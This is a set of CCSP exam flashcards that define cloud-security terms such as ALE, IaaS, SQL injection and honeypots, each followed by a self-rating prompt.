CCSP Vocabulary Flashcards

1
Q

ALE : Annualized Loss Expectancy

A

ALE = SLE * ARO

Formula for estimation of the cost of an accepted risk in a given year – i.e. if the accepted vulnerability is exploited by an attacker, ALE is the dollar cost estimate for the loss.

The ALE equals the single loss expectancy (SLE) multiplied by the annualized rate of occurrence (ARO).

The SLE = asset value * exposure factor

Exposure factor describes the loss that will happen to the asset as a result of the attack (expressed as percentage value lost) – e.g. if an assets will be wholly lost in an attack, the exposure factor is 100%… if 30% will be lost, the exposure factor is 30%, etc.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

API : Application Programming Interface

A

A set of functions, routines, tools, or protocols for building applications.

APIs are leveraged by developers to save time and increase availability as the API offers a set of working programatic methods to build connectivity without bespoke coding.

At issue for the Cloud Security Professional is that APIs are functional only and cannot be assumed to represent good security practices.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

ARO : Annualized Rate of Occurrence

A

An estimated number of times a threat will be successfully exploited within a year – e.g. if two laptops are stolen each month then the ARO is 2 * 12 = 24 times per year.

ARO is an element of the ALE calculation:
ALE = SLE * ARO

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

auditability

A

The ability to properly capture, analyze, and report on any and all events that happen within a system or application, such as data access and modification, user actions and processes, controls and compliance, and regulatory and contractual compliance.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

authentication

A

The process of comparing credentials presented by a user, application, or service to a set of known stored values that have been previously issued or verified by the authentication system.

e.g. A user is given an email address and password when provisioned to the system; later the user provides that verified and valid email address and password to the system for matching – if these credentials match and are still valid, the user is granted access to the system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

authorization

A

The process of granting or denying privileges to a system, network, or application after successful authentication has been preformed; these privileges (such as read, write, execute) are based on an approved set of constrained features enforced by a policy / rule set.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

backdoor

A

Backdoors can be created by developers or hackers: A backdoor is a method of accessing a system that bypasses the normal (“official”) authentication and authorization processes.

Backdoors can be unauthorized methods that are discovered by malicious actors to get into a system, or they can be methods that are purposefully employed by developers or support staff to access systems for maintenance or other support activities.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

baseline

A

A baseline is a constrained configuration standard or a state in time “snap shot” for a known good system state.

Baselines are often employed in change management to establish a “gold image” as in the baseline configuration of a workstation, or, as a fall back option as in “we will patch the system and fail-back to the baseline if patching causes availability issues.”

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

big data

A

Refers to the collection, processing, and analysis of data sets that are so large that traditional data processing and analysis tools are inadequate to properly handle them.

The concept of ‘big data’ is often applied outside of this formal definition to reference predictive analysis and user analytics of data sets.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

BYOD : Bring Your Own Device

A

The practice of allowing employees of an organization to use their personally owned computers, phones, tablets, or other electronic resources to access the computing resources of the firm, rather than using IT provided and supported devices.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

business continuity

A

The capability of an organization to continue the operation of systems or applications at a predetermined level after an incident or disruption of service.

Business continuity encompasses the full range of possible service disruptions and how a company can minimize, mitigate, and respond to them and keep business operations running, available, and secure.

i.e. BC is a daily, operational, discipline.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

BIA : Business Impact Analysis

A

A structured methodology to identify and evaluate the possible risks and threats that operations or services could be impacted by, as well as the possible or likely extent of impact and disruption.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

chain of custody

A

The formal documentation showing the chronological control and disposition of physical or electronic evidence.

This documentation includes creation, all changes of possession, and final disposition.

Note that any evidence with probative value may be offered to the court – i.e. chain of custody is not required for evidence to be admissible.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

CAB : Change Advisory Board

A

A group that assists the change team and change management process by evaluating, prioritizing, and approving change requests.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

change manager

A

An individual who ensures that the change management process is properly executed; this person also directly handles low-level tasks related to the change process.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

cloud application

A

An application that is never installed on a local server or desktop but is instead accessed via a network or the Internet. A cloud application merges the functionality of a local application with the accessibility of a web-based application.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

CAMP : Cloud Application Management for Platforms

A

Within PaaS implementation, CAMP serves as the framework and specification for managing platform services, encompassing a RESTful protocol for managing services, the model for describing and documenting the components that comprise that platform, and the language describing the overall platform, and its components and services, as well as metadata about it.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

cloud auditor

A

An auditor that is specifically responsible for conducting audits of cloud systems and cloud applications.

The cloud auditor is responsible for assessing the effectiveness of the cloud service and identifying control deficiencies between the cloud customer and the cloud provider, as well as the cloud broker if one is used.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

cloud backup

A

The process of using a cloud-based backup system, with files and data being sent over the network to a public or private cloud provider for backup, rather than running traditional backup systems within a data center.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

cloud backup service provider

A

A public or private cloud service’s organization that offers backup services to either the public or organizational clients either on a free basis or using various costing models based on either the amount of data or the number of systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

cloud backup solutions

A

Services that run within a public or private cloud offering backup solutions – either through client-based software that does automatic or scheduled backups or through manual backups initiated by a user or system.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

cloud computing

A

A model for enabling ubiquitous, convenient, on-demand network access to a shared pool of configurable computer resources (e.g. networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction.

This cloud model is composed of five essential characteristics, three service models, and four deployment models.

Five (5) essential characteristics: on-demand self-service, broad network access, resource pooling, rapid elasticity, and measured service

Three (3) service models: IaaS, PaaS, and SaaS

Four (4) deployment models: community cloud, hybrid cloud, private cloud, and public cloud

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

cloud computing reseller

A

An organization that sells and offers cloud services, and possibly cloud support services, to various organizations and works as a middleman between the cloud customer and cloud provider.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

CCM : Cloud Control Matrix

A

A formally published guide by the Cloud Security Alliance (CSA) that enables cloud customers to evaluate a prospective cloud provider in regard to its security posture. The CCM can also be used by cloud providers to structure its security program and services.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

cloud customer

A

An organization or individual that utilizes and consumes resources and services from a cloud provider. This can be in the form of free public services and systems or private and fee-based applications or solutions.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

cloud data portability

A

The ability to move data between cloud providers.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

cloud database

A

A database that is installed in a cloud environment and accessed via the network or the Internet by a user or application.

Because the database is being installed in a cloud environment instead of a typical server environment, elasticity, scalability, and high availability can be achieved and maximized.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

cloud deployment model

A

The cloud deployment models are public, private, hybrid, and community; these describe how the cloud service is delivered through a set of particular configurations and virtual resources.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

cloud enablement

A

The creation of a public cloud environment through the offering of services or infrastructure.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

cloud management

A

The oversight and operations management of a cloud environment by the cloud service provider, whether it is a public or private cloud environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

cloud migration

A

The process of moving services, systems, applications, or data from a traditional data-center hosting model into a cloud environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

cloud OS

A

Typically used to denote an operating system (OS) in a Platform as a Service (PaaS) implementation and to signify that the implementation is within a cloud environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

cloud provider

A

A service provider that makes storage or software applications available via the Internet or private networks to customers. Since they are offered as a service, the platform and underlying software, as well as operations and security systems, are maintained by the provider and abstracted from the customer.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

cloud provisioning

A

The process of allocating cloud resources from the cloud provider to the cloud customers based on specific requests and requirements of the customers as far as the number of virtual machines and their specific computing resources.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

CSA : Cloud Security Alliance

A

The most prominent and well-known organization to raise awareness of best practices for security within a cloud environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

cloud server hosting

A

The hosting and location of servers within a virtualized cloud environment, rather than the virtual or physical hosting that’s done in a traditional data center.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

cloud service

A

Capabilities offered via a cloud provider and accessible via a client.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

cloud service broker

A

A partner that serves an an intermediary between a cloud service customer and cloud service provider.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

cloud service category

A

A group of cloud services that have a common set of features or qualities.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

cloud service partner

A

One that holds a relationship with either a cloud service provider or a cloud service customer to assist with cloud services and their delivery.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

cloud service user

A

One that interacts with and consumes services offered by a cloud service provider.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

cloud testing

A

The testing of systems, services, or applications by leveraging cloud platforms and resources to simulate the size and scale of real-world traffic and users.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

Common Criteria

A

A set of international guidelines and specifications for the evaluation of IT security resources to ensure those resources meet an agreed-upon set of security standards. The Common Criteria for Information Technology Security Evaluation is formalized as an international standard in ISO/IEC 15408.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

community cloud

A

A cloud infrastructure provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns (for example, mission, security requirements, policy, or compliance considerations). It may be owned, managed, and operated by one or more of the organizations in the community, a third party, or some combination of these, and it may exist on or off premises.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

configuration management

A

Establishing a controlled means of consistency throughout a system’s lifecycle, based on its requirements and technical specifications to properly ensure configuration controls, performance standards, and design requirements.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

container

A

A software package that contains all of the code, configurations, and libraries needed for an application to operate, packaged inside a single unit.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q

XSS : cross-site scripting

A

A web application vulnerability that allows an attacker to inject client-side scripts into web pages that are then viewed and executed by other users. The goal of XSS from an attacker’s perspective is to bypass the security controls of an application, such as an access control with a same-origin policy.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

DAR : Data at Rest

A

Data that resides on a system in persistent storage, such as disks, tapes, databases, or any other type of storage device.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q

data dispersion

A

The feature of cloud storage where data is spread across data centers or wide geographic areas for redundancy and speed.

The degree of dispersion is typically based on the needs of the application and the level of service procured by the cloud customer.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q

DIT : Data in Transit

A

Data that flows over a networked connection – either through public unsecured networks or internal protected corporate networks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q

DIU : Data in Use

A

Data within a system or application that is currently being processed or is in use – either through the computing resources or residing in memory.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q

DLP : Data Loss Prevention

A

An overall strategy and process for ensuring that users cannot send sensitive or protected information outside of networks or systems that are secured and protected.

This can be related to the intentional attempt by users to transfer such information, but it also applies to preventing the accidental sending or leaking of data.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q

data portability

A

The ability to easily move data from one system to another without having to re-enter it.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

DoS : Denial-of-Service attack

A

An attempt to make computing resources or a network unavailable to its intended users by denying legitimate traffic access totally or by degrading performance to unacceptable levels.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q

direct identifiers

A

Information that specifically applies to a unique individual, such as name, address, phone number, e-mail address, or unique identifying numbers or codes.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
56
Q

DRS : Distributed Resource Scheduler

A

A utility from VMware that balances computing demands and available resources within the virtualized environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
57
Q

DAST : Dynamic Application Security Testing

A

The testing of an application while it is in an operational state with currently running systems, applications, and networks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
58
Q

DO : Dynamic Optimization

A

The process of moving and reallocating virtual machines and resources within a cluster environment to maintain optimal performance with balanced and distributed resource utilization.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q

eDiscovery

A

The process of discovering and securing electronic data for use in criminal or civil legal cases.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q

encryption

A

The process of encoding and securing data so that only authorized parties in possession of the correct information, credentials, or keys can access it.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q

enterprise application

A

An application that runs on a large and distributed scale and is deemed mission critical to a company or an organization.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q

enterprise cloud backup

A

A cloud-based backup and recovery service similar to those offered for personal use but scaled and focused on large-scale and organizational-level services.

63
Q

Eucalyptus :

Elastic Utility Computing Architecture for Linking Your Programs To Useful Systems

A

Free and open source software for utilizing Amazon Web Services (AWS) to build public and private cloud offerings.

64
Q

event

A

An action or situation that is recognized by software and causes the software to respond or take action – i.e. any recordable activity.

65
Q

FRCP : Federal Rules of Civil Procedure

A

The set of rules and procedures that govern civil legal proceedings in the United States federal courts to provide uniformity and efficiency in resolving legal matters and proceedings.

66
Q

FRE : Federal Rules of Evidence

A

The set of rules that apply to the United States federal courts with regard to collecting evidence in a uniform and official manner.

67
Q

federation

A

A group of IT service providers that interoperate based on an agreed-upon set of standards and operations.

68
Q

FIPS 140-2

A

A security standard published by the United States federal government that pertains to the accreditation of cryptographic modules.

69
Q

firewall

A

A part of a computing network provided by either hardware or software implementations that control which network connections are allowed to be made in regard to origin, destination, and ports, while blocking all other inbound or outbound connections.

70
Q

hashing

A

Hashing involves taking data of arbitrary type, length, or size, and using a mathematical function to map the data to a value that is of fixed size.

Hashing can be applied to virtually any type of data object: text strings, documents, images, binary data, and even virtual machine images.

71
Q

HIDS : Host Intrusion Detection System

A

A host-based intrusion detection system that monitors the internal resources of a system for malicious attempts; HIDS may also perform packet inspection and network monitoring.

72
Q

host

A

A computer that is connected to a network and provides computing services to either users or other hosts on the network.

73
Q

hybrid cloud

A

A cloud infrastructure that’s a composition of two or more distinct cloud infrastructures (private, community, or public).

74
Q

hypervisor

A

A virtual machine manager that allows and enables multiple virtual hosts to reside on the same physical host.

A Type 1 hypervisor is hardware based; a Type 2 hypervisor is application / software based.

75
Q

IdP : identity provider

A

A system responsible for determining the authenticity of a user or system, providing assurance to a service that the identity is valid and known, and possibly providing additional information about the identity of the user or system to the service provider requesting it.

76
Q

IDS : Intrusion Detection System

A

A device, appliance, or software implementation that monitors servers, systems, or networks for malicious activities.

77
Q

incident

A

An event that could potentially cause disruption to an organization’s systems, services, or applications.

78
Q

indirect identifiers

A

Information about an entity that cannot be used solely to identify that entity uniquely but can be used in combination with other data points to potentially do so; examples include place of birth, race, employment history, and educational history.

79
Q

IRM : Information Rights Management

A

A subset of digital rights management that is focused on protecting sensitive information from unauthorized exposure or use.

80
Q

IaaS : Infrastructure as a Service

A

The capability provided to a consumer to provision processing, storage, networks, and other fundamental computing resources in order to deploy and run arbitrary software, including operating systems and applications.

The consumer does not manage or control the underlying cloud infrastructure but has control over operating systems, storage, and deployed applications – and possibly limited control of select networking components such as host firewalls.

81
Q

IoT : Internet of Things

A

Internet of things (IoT) refers to the extension of Internet connectivity to devices beyond traditional computing platforms. This can include home appliances, thermostats, sensors, lighting fixtures, and so on, and is very common within the scope of “smart home” technologies.

82
Q

interoperability

A

The ease and ability to reuse components of a system or application regardless of the underlying system design and provider.

83
Q

IPS : Intrusion Prevention System

A

A network-based appliance or software that examines network traffic for known exploits, or any attempts to use exploits, and actively stops them.

84
Q

ISO/IEC 27001 and 27001:2013

A

A formal specification for information security management systems that provides, through completion of a formal audit, certification from an accredited body for compliance. ISO/IEC 27001:2013 is the latest revision.

85
Q

ITIL : IT Infrastructure Library

A

A collection of papers and concepts that lay out a vision for an IT Service Management (ITSM) framework for IT services and user support.

86
Q

jurisdiction

A

The authority to exert regulatory and legal control over a defined area of responsibility. Jurisdictions can overlap between the local, state / province, and national levels.

87
Q

KMS : Key Management Service

A

A system or service that manages keys used for encryption within a system or application that is separate from the actual host systems.

The KMS will typically generate, secure, and validate keys.

88
Q

KPI : Key Performance Indicator

A

A metric that provides a quantitative value that can be used to evaluate how effectively key business requirements are being met.

89
Q

legal hold

A

The process of collecting and preserving data as required by an official request from a legal authority.

90
Q

malware

A

A broad term that encompasses software, scripts, content, and executable code that takes the form of viruses, Trojan horses, ransomware, spyware, and other malicious programs that intend to steal information or computing resources.

91
Q

managed service provider

A

A provider of IT services where the technology, software, and operations are determined and managed away from the customer or user.

92
Q

mapping

A

The process of aligning data values and fields with specific definitions or requirements.

93
Q

MTBF : Mean Time Between Failures

A

A measure of reliability: the average time (typically in hours) between failures of a hardware component.

94
Q

MTTR : Mean Time to Repair

A

The typical or average time to repair and recover after a hardware failure.

95
Q

measured service

A

Cloud services that are delivered and billed for in a metered way.

96
Q

metadata

A

Data that gives additional or descriptive information about other data. This can be in the form of structural data that pertains to how the information is stored and represented or descriptive data that contains information about the actual content of the data.

97
Q

mobile cloud storage

A

Cloud-based storage, typically used for mobile devices such as tablets, phones, and laptops, that enables the user to access their data from any network location and across multiple devices in a uniform way.

98
Q

MDM : Mobile Device Management

A

A system that allows a firm to manage and secure mobile devices that are granted access to the firm’s resources.

This is typically accomplished by installing software on a mobile device that allows the IT department to enforce security configurations and policies, regardless of whether it is owned by the organization or is a private device owned by the user.

99
Q

multitenancy

A

Having multiple customers and applications running within the same environment but in a way that they are isolated from each other and not visible to each other, while still sharing the same resources.

100
Q

network security group

A

A set of rules that can be applied to network resources for the processing and handling of network traffic; they contain information used to filter traffic based on direction of traffic flow, source address, destination address, ports of both the source and destination, and the protocols being used for transmission.

101
Q

NIDS : Network Intrusion Detection System

A

A network-based device placed at strategic places on a network to monitor and analyze all network traffic traversing the subnet and comparing it against signatures for known vulnerabilities and attacks.

102
Q

NIST SP 800-53

A

Titled “Security and Privacy Controls for Federal Information Systems and Organizations,” NIST SP 800-53 provides a set of security controls for all systems under the United States federal government, with the exception of systems dedicated to national security.

103
Q

nonrepudiation

A

The ability to confirm the origin or authenticity of data to a high degree of certainty.

104
Q

object storage

A

A storage method used with IaaS where data elements are managed as objects rather than in hierarchical storage with a file system and directory structure.

105
Q

on-demand self-service

A

The ability for a cloud customer to provision services in an automatic manner, when needed, with minimal involvement from the cloud provider.

106
Q

TOGAF : The Open Group Architecture Framework

A

An open enterprise architecture model that design teams can use to optimize success efficiency and returns throughout a system’s lifecycle.

107
Q

OLA : Operational Level Agreement

A

An official ITIL term that relates to a specialized service level agreement (SLA) pertaining to internal parties of an organization, rather than between a customer and provider (i.e. an SLA).

108
Q

overwriting

A

The process of securely removing data from a system by writing blocks of random or opaque data on storage media to destroy any previous data and make it unrecoverable.

109
Q

pen testing / penetration testing

A

The process of testing systems and applications for vulnerabilities by employing the same tools and strategies used by malicious actors. Any exploits discovered can then be proactively addressed by the organization before a malicious actor can discover them.

110
Q

PaaS : Platform as a Service

A

The capability provided to the customer to deploy onto the cloud infrastructure any consumer-created or acquired applications written using programming languages, libraries, services, and tools supported by the provider.

The customer does not manage or control the underlying cloud infrastructure, including the network, servers, operating systems, and storage, but has control over the deployed applications and possibly configuration settings for the application-hosting environment.

111
Q

portability

A

The ability of a system or application to seamlessly and easily move between different cloud providers.

112
Q

PLA : Privacy Level Agreement

A

A declaration published by the cloud service provider documenting its approach to data privacy. The cloud service provider implements and maintains the PLA for the systems it hosts

113
Q

private cloud

A

A cloud infrastructure provisioned for exclusive use by a single organization comprising multiple consumers (for example, business units). It may be owned, managed, and operated by the organization, a third party, or some combination thereof, and it may exist on or off primises.

114
Q

PHI : Protected Health Information

A

A special designation of data under United States law that encompasses any health-related data that can be tied to an individual, including health status, healthcare service sought or provided, or any payment related to healthcare.

115
Q

public cloud

A

A cloud infrastructure provisioned for open use by the general public. It may be owned, managed, and operated by a business, academic organization, governmental organization, or some combination thereof. It exists on the premises of the cloud provider.

116
Q

quantum computing

A

Quantum computing involves the use of quantum phenomena, such as the interactions between atoms or wave movements, to aid in computation.

117
Q

RPO : Recovery Point Objective

A

A duration of time in the past that an organization is willing to revert to in order to restore lost data or services following an interruption.

118
Q

RTO : Recovery Time Objective

A

A defined maximum time duration for which an organization can accept the loss of data or services following an interruption.

119
Q

relying party

A

A system or application that provides access to secure data through the use of an identity provider.

120
Q

RDP : Remote Desktop Protocol

A

RDP is a proprietary technology, developed by Microsoft, to allow users to connect to a remote computer over a network and utilize a graphical interface with the Windows operating system.

121
Q

REST : RE-presentational State Transfer

A

A system for designing and implementing networked applications by utilizing a stateless cacheable, client-server protocol, almost always via HTTP.

122
Q

RFC : Request For Change

A

A formal documented change request, including what change is needed, why it is needed, the urgency of the change, back-out plan should the change introduce instabilities to the system, and the impact if the change is not made.

123
Q

resource pooling

A

The aggregation and allocation of resources by the cloud provider to serve the cloud customers.

124
Q

reversibility

A

The ability of a cloud customer to recover all data and applications from a cloud provider and to completely remove all data from the cloud provider’s environment.

125
Q

RASP : Runtime Application Self-Protection

A

Security technology and systems integrated into a system or application that enables it to detect and prevent attacks in real time.

126
Q

sandboxing

A

The segregation and isolation of information or processes from others within the same system or application, typically for security concerns.

127
Q

SOC : Security Operations Center

A

A SOC is a centralized group that deals with security issues within an organization or enterprise and is responsible for the monitoring, reporting, and handling of security incidents. This is done at both the technical and organizational levels and touches all information assets within the organization.

128
Q

service

A

A computing system or application that processes data.

129
Q

SLA : Service Level Agreement

A

A document agreed upon between a customer and a service provider that defines and maps out minimum performance standards for a variety of contract requirements.

An SLA typically includes minimum standards for processes, uptime, availability, security, auditing, reporting, customer service, and potentially many other requirements.

130
Q

SP : Service Provider

A

An organization that provides IT services and applications to other organizations in a sourced manner.

131
Q

SABSA :

Sherwood Applied Business Security Architecture

A

SABSA is a proven methodology for developing business-driven, risk- and opportunity-focused security architectures, at both enterprise and solutions levels, that traceably support business objectives.

It is widely used for information assurance architectures and risk management frameworks, as well as to align and seamlessly integrate security and risk management into IT architecture methods and frameworks, models, methods, and processes.

132
Q

SOAP : Simple Object Access Protocol

A

An operating system agnostic messaging protocol that is used to communicate with other systems through HTTP and XML.

133
Q

SLE : Single Loss Expectancy

A

The monetary value assigned to the occurrence of a single instance of exploit to an IT service, application, or system.

SLE = AV (asset value) * EF (exposure factor) where the EF is a percentage of the asset lost in the attack.

The SLE is an input to ALE (annualized loss expectancy):
ALE = ARO (annual rate of occurrence) * SLE

134
Q

SOA : Service-Oriented Architecture

A

A system of providing IT applications and data services to other components through communications protocols over a network, independent of any particular technology, system, provider, or implementation.

135
Q

SOC 1 / SOC 2 / SOC 3

A

Audit and accounting reports, focused on an organization’s controls, that are employed when providing secure services to users.

SOC 1: target client is financial auditors; focus is management structure, customer base, pertinent regulations, auditors that verify compliance.

SOC 2: target client is “restricted use” internal review; focus is five (5) broad areas: availability, confidentiality, processing integrity, privacy, and security

SOC 3: target client is “general use” third parties; scope of audit is similar to SOC 2 with the main difference being that the SOC 3 is intended for a general audience.

136
Q

SaaS : Software as a Service

A

An application hosted and maintained by the cloud provider as a service to be consumed by the cloud customer.

The cloud customer does not manage or control the underlying cloud infrastructure, including the network, servers, operating systems, storage, and even individual application capabilities, with the possible exception of limited user-specific application settings.

137
Q

SDN : Software Defined Networking

A

SDN separates the network configurations for the control plane from the data plane.

This separation allows network administrators to configure and control network infrastructure functions without having to get involved with the actual mechanisms for forwarding network traffic.

138
Q

SQL injection

A

A method used by malicious actors in which an SQL query is placed in an input field in hopes it will be passed to the back-end database, executed by the db, with db output returned to the attacker.

This could include attempts to access a full database, or protected data within it, or, to modify or delete data.

139
Q

SAST : Static Application Security Testing

A

Security testing of applications by analysis of source code, binaries, and configurations. This is done by testers who have in-depth knowledge of systems and applications and is performed in a non-running (i.e. static) state.

140
Q

tenant

A

One or more cloud customers who share access to a pool of resources.

141
Q

tokenization

A

The process of substituting sensitive data with an abstraction of that data (a token) which has no value outside of the application: e.g. real SSN 2341 is replaced with the token 1234, translation to the real SSN occurs only when needed and disclosure of the token 1234 is harmless to the firm and the person with SSN 2341.

142
Q

Trojan

A

An attempt to trick a user or administrator into executing an attack by disguising the true intention of a program or application.

143
Q

trust zones

A

A security concept that separates systems and data into different levels or zones; each zone can apply its own security controls based on the activities supported in that zone – e.g. RBAC for network assets.

In many instances, zones of a higher degree of trust may access those with a lower degree, but not vice versa.

144
Q

UC : Underpinning Contract

A

A contract negotiated and agreed upon between an organization and an external service provider or vendor.

145
Q

vertical cloud computing

A

The optimization of cloud computing resources for a particular stack or vertical, such as a specific type of application or system, or, by a particular industry sector.

146
Q

virtual host or virtual machine

A

A software based computing environment running on a host system as opposed to running within a physical hardware environment.

147
Q

VPN : Virtual Private Network

A

A VPN facilitates the extension of a private network over public networks and enables a device to operate as if it were on the private network directly.

A VPN works by enabling an encrypted point-to-point connection from a device into a private network, typically through software applications, but also can be done via hardware accelerators.

148
Q

VMBR : VM-Based Rootkit

A

A type of rootkit that is installed in a virtualized environment between the underlying host system and the virtual machine.

It is then executed and used when the virtual machine is started. A VM-based rootkit is very difficult to detect in an environment, but also very difficult to successfully implement.

149
Q

volume storage

A

A more typical or standard file system used with IaaS that provides a virtual partition or hard disk to a virtual machine and can be used as a traditional hard drive would be, with a file system, folders, and file organization methods.

150
Q

WAF : Web Application Firewall

A

An appliance or software plug-in that parses and filters HTTP traffic from a browser or client and applies a set of rules before the traffic is allowed to proceed to the actual application server.

151
Q

web portal

A

A web-based application that provides tools, reporting, and visibility for a user into multiple systems. In a cloud environment, a web portal typically provides metrics and service up-sell / options / capabilities that the cloud customer may choose to consume.

152
Q

XML appliance

Extensible Mark-up Language (XML)

A

An appliance that is implemented within a network to secure and manage XML traffic; it is often used within a cloud environment to help integrate cloud-based systems with those still residing in traditional data centers.

153
Q

XML external entity

Extensible Mark-up Language (XML)

A

Occurs when a developer has in their code a reference to data on the application side, such as a database key, the directory structure of the applications, configuration information about the hosting system, or any other information that pertains to the workings of the application, that should not be exposed to users or the network.

154
Q

Honeypots

A

A honeypot is a system, isolated from the production system, that is designed to appear to an attacker to be part of the production system and contain valuable data. The intent of a honeypot is to lure would-be attackers into going after the honeypot instead of a real production system.